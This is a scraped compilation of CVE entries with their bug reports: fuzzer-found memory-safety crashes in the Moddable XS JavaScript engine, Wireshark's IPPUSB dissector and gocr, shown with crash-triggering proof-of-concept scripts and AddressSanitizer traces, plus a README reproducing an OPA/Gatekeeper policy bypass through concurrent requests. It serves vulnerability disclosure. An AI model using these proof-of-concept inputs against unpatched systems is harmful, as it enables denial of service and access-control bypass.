OpenSource Moddable v10.5.0 was discovered to contain buffer over-read in the fxDebugThrow function at /moddable/xs/sources/xsDebug.c.

    operating system: ubuntu18.04
    compile command:  cd /pathto/moddable/xs/makefiles/lin
    make
    test command: ./xst poc
    

    function getHiddenValue() {
        var obj = {};
        var nEmw = new RegExp(null);
        var oob = 'value';
        var fun = eval(str);
        nEmw = new Object();
        oob = Object.assign('0', Object(521));
        var str = 'new String(\'\')';
        var fun = eval(str);
        let protoWithIndexedAccessors = {};
        var j = [];
        Object.assign(obj, fun);
        var fun = eval(str);
        return obj;
    }
    function makeOobString() {
        var hiddenValue = getHiddenValue();
        var str = 'constructor';
        var extern_arr_vars = [];
        let i = 0;
        var ijjkkk = 0;
        str = ijjkkk < 100000;
        function helper(i) {
            let a = new Array();
            var extern_arr_vars = [];
            if (ijjkkk < 100000) {
                makeOobString(a, protoWithIndexedAccessors);
            }
            return a;
            var oobString = makeOobString();
        }
        var j = [];
        var fun = eval(str);
        Object(fun, hiddenValue);
        var oobString = helper();
        for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
            fun = makeOobString();
        }
        return oobString;
    }
    var oobString = makeOobString();
    var oobString = makeOobString();
    helper(oobString);
    let protoWithIndexedAccessors = {};
    

    ASAN:SIGSEGV
    =================================================================
    ==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
        #0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
        #1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
        #2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
        #3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
        #4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
        #5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
        #6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
        #7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
    ==5974==ABORTING

CVE-2021-29328: over access(fxEnvironmentGetProperty) · Issue #585 · Moddable-OpenSource/moddable

OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fx_ArrayBuffer function at /moddable/xs/sources/xsDataView.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**heap-buffer-overflow(fx\_ArrayBuffer) #580**

Closed

rain6851 opened this issue

Feb 26, 2021

· 0 comments

**Comments**

![@rain6851](https://avatars.githubusercontent.com/u/13704697?s=88&v=4)

**Enviroment**

    operating system: ubuntu18.04
    compile command:  cd /pathto/moddable/xs/makefiles/lin
    make
    test command: ./xst poc
    

**poc:**

    function gc() {
        for (let i = 0; i < 500; i++) {
            let ab = new ArrayBuffer(1518500249 | 1073741823);
        }
    }
    function opt(obj) {
        for (let i = 0; yjwa; i++) {
        }
        let tmp = { a: 1 };
        gc();
        tmp.__proto__ = {};
        var hedB = escape(null);
        for (let k in tmp) {
            tmp.__proto__ = {};
            gc();
            obj.__proto__ = {};
            var yjwa = i < 500;
            return obj[k];
        }
    }
    opt({});
    var CPzS = fake_object_memory[0];
    let fake_object_memory = new Uint32Array(100);
    fake_object_memory[0] = 4660;
    let fake_object = opt(fake_object_memory);
    opt(9007199254740990);
    print(fake_object);
    

**description**

    =================================================================
    ==5914==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f603a9fe820 at pc 0x7f603de4ebec bp 0x7ffc75e18740 sp 0x7ffc75e17ee8
    WRITE of size 2147483647 at 0x7f603a9fe820 thread T0
        #0 0x7f603de4ebeb in __asan_memset (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8cbeb)
        #1 0x49c99e in fx_ArrayBuffer /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDataView.c:431
        #2 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
        #3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
        #4 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
        #5 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
        #6 0x7f603d4f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #7 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
    
    0x7f603a9fe820 is located 0 bytes to the right of 16777248-byte region [0x7f60399fe800,0x7f603a9fe820)
    allocated by thread T0 here:
        #0 0x7f603de5a602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
        #1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122
        #2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377
        #3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159
        #4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305
        #5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249
        #6 0x7f603d4f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memset
    Shadow bytes around the buggy address:
      0x0fec87537cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fec87537cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fec87537cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fec87537ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fec87537cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0fec87537d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==5914==ABORTING

![@dckc](https://avatars.githubusercontent.com/u/150986?s=60&v=4) dckc mentioned this issue

Mar 2, 2021

17 tasks

mkellner pushed a commit that referenced this issue

Mar 15, 2021

mkellner pushed a commit that referenced this issue

Mar 15, 2021

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@rain6851](https://avatars.githubusercontent.com/u/13704697?s=52&v=4)

CVE-2021-29327: heap-buffer-overflow(fx_ArrayBuffer) · Issue #580 · Moddable-OpenSource/moddable

OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fxIDToString function at /moddable/xs/sources/xsSymbol.c.

CVE-2021-29326: heap-buffer-overflow(fxIDToString) · Issue #583 · Moddable-OpenSource/moddable

OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fx_String_prototype_repeat function at /moddable/xs/sources/xsString.c.

    operating system: ubuntu18.04
    compile command:  cd /pathto/moddable/xs/makefiles/lin
    make
    test command: ./xst poc
    

    function getHiddenValue(){
        var obj = {};
        var oob = "/re/";
        //oob = oob.replace("re","*".repeat(0x2000));
        oob = oob.replace("re",oob = oob.replace("re","*".repeat(0x100000)).repeat(0x100000));
        var str =  'class x extends Array{'+oob+"}";
        var fun = eval(str);
        Object.assign(obj,fun);
        return obj;
    }
    function makeOobString(){
        var hiddenValue = getHiddenValue();
        var str =  'class x extends Array{}';
        var fun = eval(str);
        Object.assign(fun,hiddenValue);
        var oobString = fun.toString();
        return oobString;
    }
    var oobString = makeOobString();
    
    

    =================================================================
    ==5944==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f751f1fe820 at pc 0x7f75226c5904 bp 0x7fffc01aa870 sp 0x7fffc01aa018
    WRITE of size 1048578 at 0x7f751f1fe820 thread T0
        #0 0x7f75226c5903 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c903)
        #1 0x61c670 in fx_String_prototype_repeat /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsString.c:969
        #2 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
        #3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
        #4 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
        #5 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
        #6 0x7f7521d6982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #7 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
    
    0x7f751f1fe820 is located 0 bytes to the right of 16777248-byte region [0x7f751e1fe800,0x7f751f1fe820)
    allocated by thread T0 here:
        #0 0x7f75226d1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
        #1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122
        #2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377
        #3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159
        #4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305
        #5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249
        #6 0x7f7521d6982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
    Shadow bytes around the buggy address:
      0x0fef23e37cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fef23e37cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fef23e37cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fef23e37ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fef23e37cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0fef23e37d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
      0x0fef23e37d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fef23e37d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fef23e37d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fef23e37d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fef23e37d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==5944==ABORTING

CVE-2021-29325: heap-buffer-overflow(fx_String_prototype_repeat) · Issue #582 · Moddable-OpenSource/moddable

OpenSource Moddable v10.5.0 was discovered to contain a stack overflow via the component /moddable/xs/sources/xsScript.c.

CVE-2021-29324: stack-overflow · Issue #586 · Moddable-OpenSource/moddable

NULL pointer exception in the IPPUSB dissector in Wireshark 3.4.0 to 3.4.9 allows denial of service via packet injection or crafted capture file

Skip to content

Open Issue created Nov 01, 2021 by **A Wireshark GitLab Utility@ws-gitlab-utility**Developer

**Fuzz job crash output: fuzz-2021-11-01-6716.pcap**

Problems have been found with the following capture file:

https://www.wireshark.org/download/automated/captures/fuzz-2021-11-01-6716.pcap

stderr:

    Input file: /var/menagerie/menagerie/attachment_ippusb_print.pcapng
    
    Build host information:
    Linux runner-yq5rrvnm-project-7898047-concurrent-1 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    Distributor ID:	Ubuntu
    Description:	Ubuntu 20.04.3 LTS
    Release:	20.04
    Codename:	focal
    
    CI job ASan Menagerie Fuzz, ID 1733660730: 
    
    Return value:  0
    
    Dissector bug:  0
    
    Valgrind error count:  0
    
    
    
    Git commit
    commit 9207c6f233c96803b0b58bf58aa97ee41a79f8ab
    Author: Gerald Combs <gerald@wireshark.org>
    Date:   Sun Oct 31 16:35:20 2021 +0000
    
        [Automatic update for 2021-10-31]
        
        Update manuf, services enterprise numbers, translations, and other items.
    
    
    Command and args: /builds/wireshark/wireshark/_install/bin/tshark -2  -nVxr
    Running as user "root" and group "root". This could be dangerous.
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==64340==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f0a60f712fa bp 0x7ffcdeb329a0 sp 0x7ffcdeb321a0 T0)
    ==64340==The signal is caused by a READ memory access.
    ==64340==Hint: address points to the zero page.
        #0 0x7f0a60f712fa in dissect_ippusb /builds/wireshark/wireshark/build/../epan/dissectors/packet-ippusb.c:409:113
        #1 0x7f0a63346831 in call_dissector_through_handle /builds/wireshark/wireshark/build/../epan/packet.c:720:9
        #2 0x7f0a6333b660 in call_dissector_work /builds/wireshark/wireshark/build/../epan/packet.c:813:9
        #3 0x7f0a6333af79 in dissector_try_uint_new /builds/wireshark/wireshark/build/../epan/packet.c:1413:8
        #4 0x7f0a61eaac28 in try_dissect_next_protocol /builds/wireshark/wireshark/build/../epan/dissectors/packet-usb.c:3670:15
        #5 0x7f0a61ea651b in dissect_usb_payload /builds/wireshark/wireshark/build/../epan/dissectors/packet-usb.c:4621:19
        #6 0x7f0a61e9de3b in dissect_usb_common /builds/wireshark/wireshark/build/../epan/dissectors/packet-usb.c:5309:5
        #7 0x7f0a61ea6ff2 in dissect_win32_usb /builds/wireshark/wireshark/build/../epan/dissectors/packet-usb.c:5331:5
        #8 0x7f0a63346831 in call_dissector_through_handle /builds/wireshark/wireshark/build/../epan/packet.c:720:9
        #9 0x7f0a6333b660 in call_dissector_work /builds/wireshark/wireshark/build/../epan/packet.c:813:9
        #10 0x7f0a63343080 in call_dissector_only /builds/wireshark/wireshark/build/../epan/packet.c:3233:8
        #11 0x7f0a60b70c26 in dissect_frame /builds/wireshark/wireshark/build/../epan/dissectors/packet-frame.c:783:6
        #12 0x7f0a63346831 in call_dissector_through_handle /builds/wireshark/wireshark/build/../epan/packet.c:720:9
        #13 0x7f0a6333b660 in call_dissector_work /builds/wireshark/wireshark/build/../epan/packet.c:813:9
        #14 0x7f0a63343080 in call_dissector_only /builds/wireshark/wireshark/build/../epan/packet.c:3233:8
        #15 0x7f0a63337684 in call_dissector_with_data /builds/wireshark/wireshark/build/../epan/packet.c:3246:8
        #16 0x7f0a63336e6f in dissect_record /builds/wireshark/wireshark/build/../epan/packet.c:594:3
        #17 0x7f0a633065e8 in epan_dissect_run_with_taps /builds/wireshark/wireshark/build/../epan/epan.c:598:2
        #18 0x55a3faa94357 in process_packet_second_pass /builds/wireshark/wireshark/build/../tshark.c:3250:5
        #19 0x55a3faa9288e in process_cap_file_second_pass /builds/wireshark/wireshark/build/../tshark.c:3389:9
        #20 0x55a3faa8c9b6 in process_cap_file /builds/wireshark/wireshark/build/../tshark.c:3650:28
        #21 0x55a3faa864c8 in main /builds/wireshark/wireshark/build/../tshark.c:2102:16
        #22 0x7f0a565540b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #23 0x55a3fa9b543d in _start (/builds/wireshark/wireshark/_install/bin/tshark+0x5b43d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /builds/wireshark/wireshark/build/../epan/dissectors/packet-ippusb.c:409:113 in dissect_ippusb
    ==64340==ABORTING
    
    fuzz-test.sh stderr:
    Running as user "root" and group "root". This could be dangerous.

_no debug trace_

CVE-2021-39920: Fuzz job crash output: fuzz-2021-11-01-6716.pcap (#17705) · Issues · Wireshark Foundation / wireshark · GitLab

Problems have been found with the following capture file:

https://www.wireshark.org/download/automated/captures/fuzz-2021-11-01-6716.pcap

stderr:

    Input file: /var/menagerie/menagerie/attachment_ippusb_print.pcapng
    
    Build host information:
    Linux runner-yq5rrvnm-project-7898047-concurrent-1 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    Distributor ID:	Ubuntu
    Description:	Ubuntu 20.04.3 LTS
    Release:	20.04
    Codename:	focal
    
    CI job ASan Menagerie Fuzz, ID 1733660730: 
    
    Return value:  0
    
    Dissector bug:  0
    
    Valgrind error count:  0
    
    
    
    Git commit
    commit 9207c6f233c96803b0b58bf58aa97ee41a79f8ab
    Author: Gerald Combs <gerald@wireshark.org>
    Date:   Sun Oct 31 16:35:20 2021 +0000
    
        [Automatic update for 2021-10-31]
        
        Update manuf, services enterprise numbers, translations, and other items.
    
    
    Command and args: /builds/wireshark/wireshark/_install/bin/tshark -2  -nVxr
    Running as user "root" and group "root". This could be dangerous.
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==64340==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f0a60f712fa bp 0x7ffcdeb329a0 sp 0x7ffcdeb321a0 T0)
    ==64340==The signal is caused by a READ memory access.
    ==64340==Hint: address points to the zero page.
        #0 0x7f0a60f712fa in dissect_ippusb /builds/wireshark/wireshark/build/../epan/dissectors/packet-ippusb.c:409:113
        #1 0x7f0a63346831 in call_dissector_through_handle /builds/wireshark/wireshark/build/../epan/packet.c:720:9
        #2 0x7f0a6333b660 in call_dissector_work /builds/wireshark/wireshark/build/../epan/packet.c:813:9
        #3 0x7f0a6333af79 in dissector_try_uint_new /builds/wireshark/wireshark/build/../epan/packet.c:1413:8
        #4 0x7f0a61eaac28 in try_dissect_next_protocol /builds/wireshark/wireshark/build/../epan/dissectors/packet-usb.c:3670:15
        #5 0x7f0a61ea651b in dissect_usb_payload /builds/wireshark/wireshark/build/../epan/dissectors/packet-usb.c:4621:19
        #6 0x7f0a61e9de3b in dissect_usb_common /builds/wireshark/wireshark/build/../epan/dissectors/packet-usb.c:5309:5
        #7 0x7f0a61ea6ff2 in dissect_win32_usb /builds/wireshark/wireshark/build/../epan/dissectors/packet-usb.c:5331:5
        #8 0x7f0a63346831 in call_dissector_through_handle /builds/wireshark/wireshark/build/../epan/packet.c:720:9
        #9 0x7f0a6333b660 in call_dissector_work /builds/wireshark/wireshark/build/../epan/packet.c:813:9
        #10 0x7f0a63343080 in call_dissector_only /builds/wireshark/wireshark/build/../epan/packet.c:3233:8
        #11 0x7f0a60b70c26 in dissect_frame /builds/wireshark/wireshark/build/../epan/dissectors/packet-frame.c:783:6
        #12 0x7f0a63346831 in call_dissector_through_handle /builds/wireshark/wireshark/build/../epan/packet.c:720:9
        #13 0x7f0a6333b660 in call_dissector_work /builds/wireshark/wireshark/build/../epan/packet.c:813:9
        #14 0x7f0a63343080 in call_dissector_only /builds/wireshark/wireshark/build/../epan/packet.c:3233:8
        #15 0x7f0a63337684 in call_dissector_with_data /builds/wireshark/wireshark/build/../epan/packet.c:3246:8
        #16 0x7f0a63336e6f in dissect_record /builds/wireshark/wireshark/build/../epan/packet.c:594:3
        #17 0x7f0a633065e8 in epan_dissect_run_with_taps /builds/wireshark/wireshark/build/../epan/epan.c:598:2
        #18 0x55a3faa94357 in process_packet_second_pass /builds/wireshark/wireshark/build/../tshark.c:3250:5
        #19 0x55a3faa9288e in process_cap_file_second_pass /builds/wireshark/wireshark/build/../tshark.c:3389:9
        #20 0x55a3faa8c9b6 in process_cap_file /builds/wireshark/wireshark/build/../tshark.c:3650:28
        #21 0x55a3faa864c8 in main /builds/wireshark/wireshark/build/../tshark.c:2102:16
        #22 0x7f0a565540b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #23 0x55a3fa9b543d in _start (/builds/wireshark/wireshark/_install/bin/tshark+0x5b43d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /builds/wireshark/wireshark/build/../epan/dissectors/packet-ippusb.c:409:113 in dissect_ippusb
    ==64340==ABORTING
    
    fuzz-test.sh stderr:
    Running as user "root" and group "root". This could be dangerous.

_no debug trace_

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information

CVE-2021-39920: Fuzz job crash output: fuzz-2021-11-01-6716.pcap (#17705) · Issues · Wireshark Foundation / wireshark

** DISPUTED ** Styra Open Policy Agent (OPA) Gatekeeper through 3.7.0 mishandles concurrency, sometimes resulting in incorrect access control. The data replication mechanism allows policies to access the Kubernetes cluster state. During data replication, OPA/Gatekeeper does not wait for the replication to finish before processing a request, which might cause inconsistencies between the replicated resources in OPA/Gatekeeper and the resources actually present in the cluster. Inconsistency can later be reflected in a policy bypass. NOTE: the vendor disagrees that this is a vulnerability, because Kubernetes states are only eventually consistent.

**opa-gatekeeper-concurrency-issue**

Proof-of-Concept of a concurrency issue in OPA/Gatekeeper using data replication.

OPA/Gatekeeper data replication mechanism allows policies to access the Kubernetes cluster state. During data replication, OPA/Gatekeeper does not wait for the replication to finish before processing a request, potentially leading to inconsistencies between the resources replicated in OPA/Gatekeeper and the resources actually present in the cluster. Such inconsistency eventually leads to policy bypass, as demonstrated in this PoC.

**How to reproduce**

In the reproductible example, we are enforcing "Unique Service Selector" policy (from https://docs.rafay.co/recipes/governance/service\_selector\_policy/) so two different Services cannot be created with the same app selector. Service 1 and Service 2 have the same app selector `service`. However, by running multiple concurrent request, the policy is eventually bypassed and the two services are created with the same selector. Note that this violation should normally appears during audit afterwards.

The following video shows the PoC running in a Kubernetes cluster using Ubuntu 18.04.5, kubectl v1.20, gatekeeper v3.1.3.

![](https://github.com/hkerma/opa-gatekeeper-concurrency-issue/raw/master/poc.gif)

Steps: Using a Kubernetes cluster:

*   Deploy OPA/Gatekeeper: `kubectl apply -f gatekeeper.yaml`. The OPA/Gatekeeper pods are deployed in the `gatekeeper-system` namespace.
*   Enable the data replication mechanism on Services: `kubectl apply -f config.yaml`.
*   Enforce the policy: `kubectl apply -f template.yaml; kubectl apply -f constraint.yaml`.
*   Run the PoC: `python3 script.py`. After a few tries, Service 1 and Service 2 should eventually be created and coexist in the cluster, result of the policy bypass.

More specifically, the script tries to create the two concurrent services almost at the same time (Popen doesn't wait for the process to finish), and monitor the creation success or failure.

CVE-2021-43979: GitHub - hkerma/opa-gatekeeper-concurrency-issue: PoC of a concurrency issue in OPA/Gatekeeper using data replication

An use-after-free vulnerability was discovered in gocr through 0.53-20200802 in context_correction() in pgm2asc.c.

**System info**

Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), gocr (latest jocr-dev 0.53-20200802)

**Configure**

CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure

**Command line**

./src/gocr -m 4 ./use-after-free-context\_correction-pgm2asc-2817

**AddressSanitizer output**

\=================================================================
\==33563\==ERROR: AddressSanitizer: heap\-use\-after\-free on address 0x61a000001ea4 at pc 0x00000054552b bp 0x7ffde2563980 sp 0x7ffde2563978
READ of size 4 at 0x61a000001ea4 thread T0
    #0 0x54552a in context\_correction /home/seviezhou/AlphaFuzz/targets/jocr/src/pgm2asc.c:2817:39
    #1 0x54a291 in pgm2asc /home/seviezhou/AlphaFuzz/targets/jocr/src/pgm2asc.c:3427:28
    #2 0x518776 in main /home/seviezhou/AlphaFuzz/targets/jocr/src/gocr.c:350:5
    #3 0x7f394175f83f in \_\_libc\_start\_main /build/glibc\-e6zv40/glibc\-2.23/csu/../csu/libc\-start.c:291
    #4 0x41a768 in \_start (/home/seviezhou/AlphaFuzz/targets/gocr/src/gocr+0x41a768)

0x61a000001ea4 is located 36 bytes inside of 1376\-byte region \[0x61a000001e80,0x61a0000023e0)
freed by thread T0 here:
    #0 0x4de7b8 in \_\_interceptor\_cfree.localalias.0 /home/seviezhou/llvm\-6.0.0/projects/compiler\-rt/lib/asan/asan\_malloc\_linux.cc:76
    #1 0x54c1a7 in free\_box /home/seviezhou/AlphaFuzz/targets/jocr/src/box.c:122:3

previously allocated by thread T0 here:
    #0 0x4de978 in \_\_interceptor\_malloc /home/seviezhou/llvm\-6.0.0/projects/compiler\-rt/lib/asan/asan\_malloc\_linux.cc:88
    #1 0x54bdc2 in malloc\_box /home/seviezhou/AlphaFuzz/targets/jocr/src/box.c:96:24

SUMMARY: AddressSanitizer: heap\-use\-after\-free /home/seviezhou/AlphaFuzz/targets/jocr/src/pgm2asc.c:2817:39 in context\_correction
Shadow bytes around the buggy address:
  0x0c347fff8380: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c347fff8390: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c347fff83a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c347fff83b0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c347fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c347fff83d0: fd fd fd fd\[fd\]fd fd fd fd fd fd fd fd fd fd fd
  0x0c347fff83e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c347fff83f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c347fff8400: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c347fff8410: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c347fff8420: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==33563\==ABORTING

CVE-2021-33480: Optical Character Recognition (GOCR) / Bugs

A stack-based buffer overflow vulnerability was discovered in gocr through 0.53-20200802 in measure_pitch() in pgm2asc.c.

**System info**

Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), gocr (latest jocr-dev 0.53-20200802)

**Configure**

CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure

**Command line**

./src/gocr -m 4 @@

**AddressSanitizer output**

\=================================================================
\==38065\==ERROR: AddressSanitizer: stack\-buffer\-underflow on address 0x7ffe7647eb3c at pc 0x00000052ddff bp 0x7ffe7647eb10 sp 0x7ffe7647eb08
READ of size 4 at 0x7ffe7647eb3c thread T0
    #0 0x52ddfe in measure\_pitch /home/seviezhou/jocr/src/pgm2asc.c:1689:24
    #1 0x549a9f in pgm2asc /home/seviezhou/jocr/src/pgm2asc.c:3377:3
    #2 0x518776 in main /home/seviezhou/jocr/src/gocr.c:350:5
    #3 0x7ff058f3083f in \_\_libc\_start\_main /build/glibc\-e6zv40/glibc\-2.23/csu/../csu/libc\-start.c:291
    #4 0x41a768 in \_start (/home/seviezhou/gocr/src/gocr+0x41a768)

Address 0x7ffe7647eb3c is located in stack of thread T0 at offset 28 in frame
    #0 0x529aaf in measure\_pitch /home/seviezhou/jocr/src/pgm2asc.c:1455

  This frame has 1 object(s):
    \[32, 4128) 'pdists' (line 1456) <== Memory access at offset 28 underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack\-buffer\-underflow /home/seviezhou/jocr/src/pgm2asc.c:1689:24 in measure\_pitch
Shadow bytes around the buggy address:
